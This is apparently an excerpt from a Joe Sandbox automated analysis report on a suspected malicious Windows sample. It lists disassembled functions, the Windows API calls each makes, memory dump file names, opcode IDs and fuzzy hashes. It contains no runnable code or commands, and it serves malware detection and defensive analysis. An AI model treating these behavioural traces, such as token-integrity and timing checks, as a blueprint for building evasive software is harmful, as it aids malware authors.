                        • Instruction Fuzzy Hash: B131AF71A0021AEFDF01CFA8C999ADE7BB5EB04315F114225F925E72D1C770A954CB90
                        Function 003C5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C5745
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 003C579D
                        • _wcslen.LIBCMT ref: 003C57AF
                        • _wcslen.LIBCMT ref: 003C57BA
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen
                        • String ID:
                        • API String ID: 763830540-0
                        • Opcode ID: 88c7723a35b43749bff5f3c593315dcd1ddd9541207202f2ab5b65692bfaa595
                        • Instruction ID: 59d6bf9400f5be7a87caa2ca9d4c68463209ff108cd01660f3178b66abdf4558
                        • Opcode Fuzzy Hash: 88c7723a35b43749bff5f3c593315dcd1ddd9541207202f2ab5b65692bfaa595
                        • Instruction Fuzzy Hash: A52185719046189ADB229F61CC85FEEB7BCFF04725F10825AE919EA190D770ADC5CF50
                        Function 003B0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                        • IsWindow.USER32(00000000), ref: 003B0951
                        • GetForegroundWindow.USER32 ref: 003B0968
                        • GetDC.USER32(00000000), ref: 003B09A4
                        • GetPixel.GDI32(00000000,?,00000003), ref: 003B09B0
                        • ReleaseDC.USER32(00000000,00000003), ref: 003B09E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: e05685d7c41ffe0a919fe64d40fd38850fc9764f7f6a694ef5a8f3b86a094904
                        • Instruction ID: 8b611ba720cb8ce722ed48e2b1b1f06dcee4bb072c2a6a9111b4aa8a433dd408
                        • Opcode Fuzzy Hash: e05685d7c41ffe0a919fe64d40fd38850fc9764f7f6a694ef5a8f3b86a094904
                        • Instruction Fuzzy Hash: 99218E35600204AFD705EF65C988EAFBBE9EF49740F048068E94AEB762CB30AC04CB50
                        Function 0036CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0036CDC6
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036CDE9
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036CE0F
                        • _free.LIBCMT ref: 0036CE22
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036CE31
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 71249b9dddd358495c433568f737b94ed666047f778feb4296c2c9b76168eb51
                        • Instruction ID: aadf0bf7788fe4f3815e882ca13eadcaa321cdba6d6de9d4b336b48f673c3b39
                        • Opcode Fuzzy Hash: 71249b9dddd358495c433568f737b94ed666047f778feb4296c2c9b76168eb51
                        • Instruction Fuzzy Hash: A501D872A212157F632316B66C48C7B7D7DDEC6BA23169129F905C7104DA668D0182B4
                        Function 00349639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                        Download Yara Rule
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                        • SelectObject.GDI32(?,00000000), ref: 003496A2
                        • BeginPath.GDI32(?), ref: 003496B9
                        • SelectObject.GDI32(?,00000000), ref: 003496E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: a76eaa0d52031b4b60d46572c68463c7aafad5ee23c6dbcda195be58e5da2472
                        • Instruction ID: b51bd0366801e82ba304ff2594021399c26f55aa4e32aff79375f3b29b0571f7
                        • Opcode Fuzzy Hash: a76eaa0d52031b4b60d46572c68463c7aafad5ee23c6dbcda195be58e5da2472
                        • Instruction Fuzzy Hash: 742187B0812305EFDB129F65ED18BAA3BF9BB50365F160227F414BA1B0D374A851CF98
                        Function 00395711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
                        • Instruction ID: 7eda63687a5af1463584d41d524440321438e40f1007895826f09450900bc4c2
                        • Opcode Fuzzy Hash: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
                        • Instruction Fuzzy Hash: 2A01F1A6341A09BFEA0B6A50AD92FFB736D9B303A5F004024FD049E641F730EF5483A0
                        Function 00362DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6), ref: 00362DFD
                        • _free.LIBCMT ref: 00362E32
                        • _free.LIBCMT ref: 00362E59
                        • SetLastError.KERNEL32(00000000,00331129), ref: 00362E66
                        • SetLastError.KERNEL32(00000000,00331129), ref: 00362E6F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
                        • Instruction ID: 0959f250a0796f3d74ac0564189e1748b99fbdb479aa166c45a9ee2857da9924
                        • Opcode Fuzzy Hash: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
                        • Instruction Fuzzy Hash: 1401F436645E0067C61327346D49D2B265DABD23A1F27D438F425E62DAEB368C118220
                        Function 0039000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                        Download Yara Rule
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390070
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
                        • Instruction ID: d16f3209618d3e712bc5561f685a904693ce9b400f52a9d94cda65bfd5d2c2f0
                        • Opcode Fuzzy Hash: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
                        • Instruction Fuzzy Hash: 53018B76610204BFDF169F68DC04FAE7AEDEB44792F145124F909D2210E775ED408BA0
                        Function 0039E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?), ref: 0039E997
                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0039E9A5
                        • Sleep.KERNEL32(00000000), ref: 0039E9AD
                        • QueryPerformanceCounter.KERNEL32(?), ref: 0039E9B7
                        • Sleep.KERNEL32 ref: 0039E9F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
                        • Instruction ID: de5f8a3087586b7017ad07987b8f7b39e6c90cd5382df53c46c9d972ecd0c1ee
                        • Opcode Fuzzy Hash: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
                        • Instruction Fuzzy Hash: 37015731C11629DBCF02EBE5DC59AEDBB7CFB08300F050946E502B2241CB38A950CBA1
                        Function 003910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
                        • Instruction ID: f4b8a583e418e8e6c59502374420b1b21ab5e941ab30a55de65b41717774a9d4
                        • Opcode Fuzzy Hash: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
                        • Instruction Fuzzy Hash: 40011979210205BFDB124FA5DC4DE6A3B6EEF893A0F254419FA49D7360DB31EC019B60
                        Function 00390FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
                        • Instruction ID: d15f2590ac83ac9ca55a116c9e073da48f73978d64144c7e32aa92c01500f869
                        • Opcode Fuzzy Hash: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
                        • Instruction Fuzzy Hash: 6DF04939210312ABDB224FA5AC49F563BADFF89762F154414FA49D6251CA71EC40CB60
                        Function 00391014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0039102A
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00391036
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391045
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0039104C
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391062
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
                        • Instruction ID: 5f4eb8d2b203193ee7c8d6312e85af05f6c3abc1ae045fb359b3f0e45eb9dc8b
                        • Opcode Fuzzy Hash: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
                        • Instruction Fuzzy Hash: 30F06D39210312EBDB236FA5EC49F563BADFF897A1F150414FA49D7250CA71E8408B60
                        Function 003A030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0324
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0331
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A033E
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A034B
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0358
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0365
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
                        • Instruction ID: ac43862df00c9d4a57ab0154d64256190a85d199bdbf366b6b0ca21c88759b85
                        • Opcode Fuzzy Hash: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
                        • Instruction Fuzzy Hash: 6F01EE7A800B018FCB36AF66D880802FBF9FF613053068A3FD19652970C3B1A948CF80
                        Function 0036D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 0036D752
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036D764
                        • _free.LIBCMT ref: 0036D776
                        • _free.LIBCMT ref: 0036D788
                        • _free.LIBCMT ref: 0036D79A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
                        • Instruction ID: 25088ef0dd8a663047f7afbc113753d250dc0d5d45ecab6d462a12b974622e66
                        • Opcode Fuzzy Hash: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
                        • Instruction Fuzzy Hash: A1F01232B54608ABC627EF64FAC5C2777DDBB46750B969805F048DB509CB30FC90C665
                        Function 00395C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 00395C58
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00395C6F
                        • MessageBeep.USER32(00000000), ref: 00395C87
                        • KillTimer.USER32(?,0000040A), ref: 00395CA3
                        • EndDialog.USER32(?,00000001), ref: 00395CBD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: c4dde47f9b51479141d185cdc0f570bc63ee1e745658e2571c4715769442e21c
                        • Instruction ID: e529dc4da4e6ac98d382f05aa4487d3c9b649a93444ddc754f3d165d34a1f27f
                        • Opcode Fuzzy Hash: c4dde47f9b51479141d185cdc0f570bc63ee1e745658e2571c4715769442e21c
                        • Instruction Fuzzy Hash: AD016D30510B04ABEF235B10DE4EFA677BCBB00B05F041559E686A15E1DBF5A9948F90
                        Function 003622A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 003622BE
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 003622D0
                        • _free.LIBCMT ref: 003622E3
                        • _free.LIBCMT ref: 003622F4
                        • _free.LIBCMT ref: 00362305
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
                        • Instruction ID: c698bccd591acda3dcc594fb1fae344dfe7885d17adda8952b4225fd206e1edb
                        • Opcode Fuzzy Hash: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
                        • Instruction Fuzzy Hash: BEF0B4705509118BC717AF54BE0191A3BE4F71A790F02456EF000F6279C7750821FFE9
                        Function 003495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        • EndPath.GDI32(?), ref: 003495D4
                        • StrokeAndFillPath.GDI32(?,?,003871F7,00000000,?,?,?), ref: 003495F0
                        • SelectObject.GDI32(?,00000000), ref: 00349603
                        • DeleteObject.GDI32 ref: 00349616
                        • StrokePath.GDI32(?), ref: 00349631
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
